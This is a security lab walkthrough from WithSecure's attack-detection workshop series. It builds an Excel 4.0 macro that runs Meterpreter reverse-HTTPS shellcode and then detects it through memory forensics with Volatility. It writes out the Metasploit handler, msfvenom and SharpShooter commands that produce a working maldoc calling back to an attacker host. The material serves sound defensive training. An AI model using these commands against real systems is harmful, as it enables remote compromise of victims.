{"id":10595,"date":"2020-06-24T09:00:00","date_gmt":"2020-06-24T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-4\/"},"modified":"2026-05-25T10:34:47","modified_gmt":"2026-05-25T09:34:47","slug":"attack-detection-fundamentals-initial-access-lab-4","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-4\/","title":{"rendered":"Attack Detection Fundamentals: Initial Access &#8211; Lab #4"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals: Initial Access &#8211; <span class=\"blue-text\">Lab #4<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Endpoint Security                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                24 6\u6708, 2020                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    \u30b7\u30a7\u30a2\u3059\u308b                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-4\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#4\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Initial Access &#8211; Lab #4&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-4\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_news-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_e2c49de46cbcb17a58ed2926fcb51972\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Riccardo Ancarani<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                \u30b3\u30f3\u30c6\u30f3\u30c4\u30ca\u30d3\u30b2\u30fc\u30b7\u30e7\u30f3            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    \u30bb\u30af\u30b7\u30e7\u30f3\u3092\u9078\u629e                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-4\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#4\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Initial Access &#8211; Lab #4&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-4\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the first part of WithSecure Consulting&#x27;s Attack Detection Workshop series, covering Initial Access, we explored a number of offensive techniques for obtaining a foothold within a target environment through the creation and successful delivery of malicious documents (also known as maldocs).<\/p>\n<p>We also explored the detection strategies that can be employed to spot these using our own detection stacks. The following blog provides the fourth and final step-by-step guide to recreating the demos from that Initial Access workshop, as well as exercises to further the reader&#x27;s understanding of the concepts shown.<\/p>\n<p>A recording of the workshop can be found <a href=\"https:\/\/youtu.be\/DDK_hC90kR8\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In the <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-1\/\" target=\"_blank\" rel=\"noopener\">first<\/a> <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-2\/\" target=\"_blank\" rel=\"noopener\">three<\/a> <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-initial-access-lab-3\/\" target=\"_blank\" rel=\"noopener\">labs<\/a> of this series, we&#x27;ve been exploring the opportunities to detect malicious activity through parent-child process analysis and the network connections established by our newly-spawned processed. In this final lab, we are going to craft a malicious Excel 4.0 Macro (XLM) that executes shellcode. The shellcode will be a Meterpreter stager that will allow us to obtain a remote session on a victim workstation.<\/p>\n<p>Excel 4.0 Macros have gained a lot of popularity recently amongst threat actors, this was mainly due to the limited visibility that AVs\/EDRs had in regards to these types of macros. For the purposes of this lab, our macro will be generated using MDSec&#x27;s <a href=\"https:\/\/github.com\/mdsecactivebreach\/SharpShooter\" target=\"_blank\" rel=\"noopener\">SharpShooter<\/a> framework.<\/p>\n<p>Shellcode can be defined as a small and self-contained piece of machine code, often used to download and execute additional malware or to deploy an implant.<\/p>\n<p>The expression &quot;executing shellcode&quot; simply means that a process executes this self-contained position independent code in its own address space. While &quot;injecting shellcode&quot; typically refers to forcing another process to execute it.<\/p>\n<p>In addition to generating and executing the malicious payload, we will also walk through the analysis of the compromised host&#x27;s memory using popular and open source tools, like Volatility.<\/p>\n<h2>References<\/h2>\n<ul>\n<li><a href=\"https:\/\/outflank.nl\/blog\/2018\/10\/06\/old-school-evil-excel-4-0-macros-xlm\/\" target=\"_blank\" rel=\"noopener\">Outflank &#8211; Old school: evil Excel 4.0 macros (XLM)<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/mdsecactivebreach\/SharpShooter\" target=\"_blank\" rel=\"noopener\">MDSec &#8211; SharpShooter<\/a><\/li>\n<li><a href=\"https:\/\/www.metasploit.com\/\" target=\"_blank\" rel=\"noopener\">Rapid7 &#8211; Metasploit<\/a><\/li>\n<li><a href=\"https:\/\/www.volatilityfoundation.org\/\" target=\"_blank\" rel=\"noopener\">Volatility<\/a><\/li>\n<\/ul>\n<h2>Required Tools<\/h2>\n<ul>\n<li>Windows VM<\/li>\n<li>Microsoft Office (specifically Excel)<\/li>\n<li><a href=\"https:\/\/www.metasploit.com\/\" target=\"_blank\" rel=\"noopener\">Metasploit<\/a><\/li>\n<li>Software for memory acquisition (such as <a href=\"https:\/\/my.comae.com\/\" target=\"_blank\" rel=\"noopener\">DumpIt<\/a>)<\/li>\n<\/ul>\n<h2>Walkthrough<\/h2>\n<h3>1 &#8211; Listener Setup<\/h3>\n<p>The first step of this simulation will be setting up the C2 framework in order to receive the reverse connection. We will use Metasploit, but any other C2 framework capable of exporting raw shellcode would be sufficient.<\/p>\n<p>Installation and setup of the framework is outside of the scope of this lab and is therefore left as an exercise for the reader.<\/p>\n<p>Let&#x27;s start the Metasploit console and configure what, in Metasploit terminology, is known as a &quot;handler&quot;:<\/p>\n<pre><code class=\"language-bash\">msfconsole\nuse exploit\/multi\/handler<\/code><\/pre>\n<p>This should bring you in the handler configuration. Here, we will configure the IP address and port where Metasploit will be listening:<\/p>\n<pre><code class=\"language-bash\"># configure the parameters\nset LHOST OUR_IP\nset LPORT 4444\nset PAYLOAD windows\/meterpreter\/reverse_https\n\n# start the handler\nexploit<\/code><\/pre>\n<p>The most relevant command is the &#x27;set PAYLOAD&#x27; that will tell Metasploit the payload type that we are going to use.<\/p>\n<p>At a high-level, the payload we chose is a Meterpreter implant that communicates back to the Metasploit server using HTTPS. Metasploit uses a specific naming convention for payloads:<\/p>\n<pre><code class=\"language-bash\">&lt;platform&gt; \/ &lt;architecture, x86 is implicit&gt; \/ &lt;payload type&gt; \/ &lt;communication type&gt;<\/code><\/pre>\n<p>Meterpreter is Metasploit&#x27;s standard implant, and its definition is the following (kindly borrowed from <a href=\"https:\/\/www.offensive-security.com\/metasploit-unleashed\/about-meterpreter\" target=\"_blank\" rel=\"noopener\">Offensive Security<\/a>):<\/p>\n<p>Meterpreter is an advanced, dynamically-extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.<\/p>\n<p>At this point, our C2 framework should be ready to receive connections. Let&#x27;s move on to the payload generation part.<\/p>\n<h3>2 &#8211; Payload Generation<\/h3>\n<p>In order to generate suitable shellcode, we will use &#x27;msfvenom&#x27;, a utility of the Metasploit framework used to generate payloads in different formats and for multiple platforms.<\/p>\n<p>The command we are going to use is the following:<\/p>\n<pre><code class=\"language-bash\">msfvenom -p windows\/meterpreter\/reverse_https LHOST=OUR_IP LPORT=4444 -f raw -b &#x27;\\x00&#x27; -e x86\/shikata_ga_nai -o shellcode.bin<\/code><\/pre>\n<p>Let&#x27;s analyse the command:<\/p>\n<ul>\n<li>&#x27;-p windows\/meterpreter\/reverse_https&#x27; tells &#x27;msfvenom&#x27; to generate a payload that will be suitable for the listener we previously created. This value needs to correspond to the one configured in the &#x27;exploit\/multi\/handler&#x27; within Metasploit.<\/li>\n<li>&#x27;LHOST=OUR_IP LPORT=4444&#x27; will configure the IP address and port where the payload will connect back to.<\/li>\n<li>&#x27;-f raw&#x27; will tell the tool to generate raw shellcode.<\/li>\n<li>&#x27;-b &#x27;\\x00&#x27;&#x27; will tell the tool to avoid the &#x27;0x00&#x27; (null) byte within the generated shellcode. This is due to a limitation of the technique that does not allow the aforementioned byte to be present.<\/li>\n<li>&#x27;-e x86\/shikata_ga_nai&#x27; will configure the encoder with which our shellcode will be transformed.<\/li>\n<li>&#x27;-o shellcode.bin&#x27; will tell the tool to write the shellcode into a file called &#x27;shellcode.bin&#x27;.<\/li>\n<\/ul>\n<p>If everything worked as expected, you should see something like this:<\/p>\n<p>Now that we have our shellcode, we can pass it to the SharpShooter framework to generate the malicious Excel 4.0 Macro. Setup instruction for the framework are provided in the <a href=\"https:\/\/github.com\/mdsecactivebreach\/SharpShooter\" target=\"_blank\" rel=\"noopener\">main<\/a> github repository.<\/p>\n<p>The command we will use is as follows:<\/p>\n<pre><code class=\"language-bash\">python SharpShooter.py --payload slk --rawscfile shellcode.bin --output test<\/code><\/pre>\n<p>The command is quite self-explanatory, but in a nutshell it will take the shellcode that we generated using &#x27;msfvenom&#x27; and apply it to a pre-built <a href=\"https:\/\/github.com\/mdsecactivebreach\/SharpShooter\/blob\/master\/modules\/excel4.py\" target=\"_blank\" rel=\"noopener\">template<\/a>. A successful execution should look like this:<\/p>\n<p>This will generate a file called &#x27;test.slk&#x27; int the &#x27;output&#x27; subfolder.<\/p>\n<h3>3 &#8211; Execution<\/h3>\n<p>Move the SLK file into the target VM and test the execution by double clicking the file. You should receive the classic macro warning:<\/p>\n<p>Click on &quot;Enable Content&quot;.<\/p>\n<h3>4 &#8211; Memory Acquisition<\/h3>\n<p>In order to obtain a snapshot of the live memory of the &quot;infected&quot; host, we will use the DumpIt software, but it&#x27;s possible to obtain the same results with other tools.<\/p>\n<p>Simply double-click on the &#x27;DumpIt&#x27; executable and confirm. If everything went well, you should see something like this:<\/p>\n<h2>Exercises<\/h2>\n<p>The following exercises will use the Volatility software. The aim of this section will be to provide the reader with questions that will guide them through a basic memory forensics exercise.<\/p>\n<p>1 &#8211; Just from the memory image you acquired, what is the correct Volatility profile to use?<\/p>\n<p>You can use the following command &#x27;vol.py -f image.raw imageinfo&#x27; to get all the candidates for the correct memory profiles.<\/p>\n<p>2 &#8211; Can you list the processes? do you see anything anomalous?<\/p>\n<p>You can use the &#x27;pstree&#x27; command to view the process tree.<\/p>\n<p>You shouldn&#x27;t see anything suspicious from the processes; that&#x27;s one of the main advantages of shellcode injection as most of the time it does not rely on creating a new process.<\/p>\n<p>3 &#8211; Can you identify any injected code within the running processes? Anything suspicious within the Excel process?<\/p>\n<p>Use the &#x27;malfind&#x27; command to identify all the injected memory sections. You should see that some of the memory sections within the Excel process are marked as injected.<\/p>\n<p>4 &#8211; Based on the results of the previous question, can you extract the injected shellcode and identify the C2 IP address?<\/p>\n<p>If you append the &#x27;-D directory&#x27; to the &#x27;malfind&#x27; command we previously executed, you will be able to dump on disk all the injected memory sections. You can specify the PID of Excel if you want to narrow down the results. Perform an hexdump of the dump from the Excel process and you should be able to see the IP address of the C2 in the last few lines.<\/p>\n<h2>Conclusion<\/h2>\n<p>The last lab of the initial access workshop included a more advanced technique, where Win32 APIs were used to execute a shellcode within the Excel&#x27;s process memory space. No other additional process was created and from a networking perspective, Excel is expected to communicate with the internet. This raised the bar from the previously shown techniques, as this time the detection of this attack would require a lower-level approach.<\/p>\n<p>The aim of this demo was not only to provide actionable detections, but also to show how some enterprise products work under the hood. In fact, memory scanning is a common feature in EDRs, but something that is not usually exposed to end users. However, we do believe that understanding the inner workings of the entire detection stack would massively help the analysts to identify gaps and limitations.<\/p>\n<p>The main takeaways from the last lab are to understand how attackers might abuse Win32 APIs to execute code, and how this is not something easily identified.<\/p>\n<p>A detection opportunity that was not discussed but it is worth mentioning, is that using the tools&#x27; configuration that was showed, the Excel process would actually communicate to an address that does not belong to Microsoft. This fact could be used to build some level of detection, but we do appreciate that might be difficult to scale to an enterprise level.<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-4\/&#038;title=Attack%20Detection%20Fundamentals:%20Initial%20Access%20&#8211;%20Lab%20#4\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Initial Access &#8211; Lab #4&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-initial-access-lab-4\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                        <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-cta-banner edwp-block js-wp-block-cta-banner wp-block-cta-banner--style-icon wp-block-cta-banner--no-image layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cta-banner__container\">\n        <div class=\"wp-block-cta-banner__box row-load\">\n            <div class=\"wp-component-content wp-component-content--help-text wp-component-content--dark wp-block-cta-banner__content\">\n                        <div class=\"wp-component-content__inner\">\n                <h2 class=\"wp-component-heading text--h2 wp-component-heading--dark wp-component-content__title\">\n    What <span class=\"blue-text\">next?<\/span><\/h2>                                    <div class=\"wp-component-content__content wysiwyg wysiwyg--dark\">\n                        <div class=\"wp-component-paragraph wp-component-paragraph--dark\">\n    <p class=\"text--p-medium\">Discover WithSecure\u2122 Elements Exposure Management.<br \/>\n&#8211; No credit card required. No obligations.No complexity.<\/p>\n<\/div>\n                    <\/div>\n                            <\/div>\n                            <div class=\"wp-component-content__buttons\">\n                <a class=\"wp-component-button btn btn--primary btn--dark\" href=\"https:\/\/www.withsecure.com\/en\/contact-us\/\">Contact us<\/a>            <\/div>\n                <\/div>                    <\/div>\n    <\/div>\n<\/section>\n\n\n\n\n<section\n    class=\"wp-block-cards edwp-block wp-block-cards--col-3 js-wp-block-cards wp-block-cards--show-overflow wp-block-cards--auto-slides-per-view layout--spacing-xxxl-top layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-cards__container\">\n        <div class=\"wp-component-content wp-component-content--default wp-block-cards__content\">\n            <h2 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Related <span class=\"blue-text\">Labs content<\/span><\/h2>                    <div class=\"wp-component-content__inner\">\n                                    <div class=\"wp-component-content__content wysiwyg\">\n                        <div class=\"wp-component-paragraph \">\n    <p class=\"text--p-medium\"><span data-teams=\"true\">Find related content relating to this topic.<\/span><\/p>\n<\/div>\n                    <\/div>\n                                                            <\/div>\n                <\/div>                            <div\n                class=\"swiper wp-block-cards__swiper js-wp-block-cards-swiper\"\n                data-slides-per-view-desktop=\"auto\"\n                data-slides-per-view-tablet=\"auto\"\n                data-slides-per-view-mobile=\"auto\"\n            >\n                <div class=\"swiper-wrapper wp-block-cards__swiper-wrapper row-load\">\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/darkgate-rises\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Threat intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Reverse engineering a Lumma infection<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Lumma is an information stealer that the WithSecure Detection and Response Team (DRT) have encountered several times. It has seen wider use over the past couple of years, and makes for an interesting threat to monitor.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/reverse-engineering-a-lumma-infection\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                            <div class=\"swiper-slide wp-block-cards__slide\">\n                            <div class=\"wp-component-card-insight wp-block-cards__card\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img loading=\"lazy\" decoding=\"async\" width=\"618\" height=\"440\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp\" class=\"wp-component-card-insight__image\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder.jpg.webp 618w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-300x214.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-447x318.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/placeholder-205x146.jpg.webp 205w\" sizes=\"auto, (max-width: 618px) 100vw, 618px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/\u30e9\u30dc<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">AI security<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Machine learning-driven malware analysis<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">With the rapid emergence of new malware variants, accurately classifying and attributing malware samples has become more challenging than ever<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/machine-learning-driven-malware-analysis\/\">\u3082\u3063\u3068\u8aad\u3080<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div 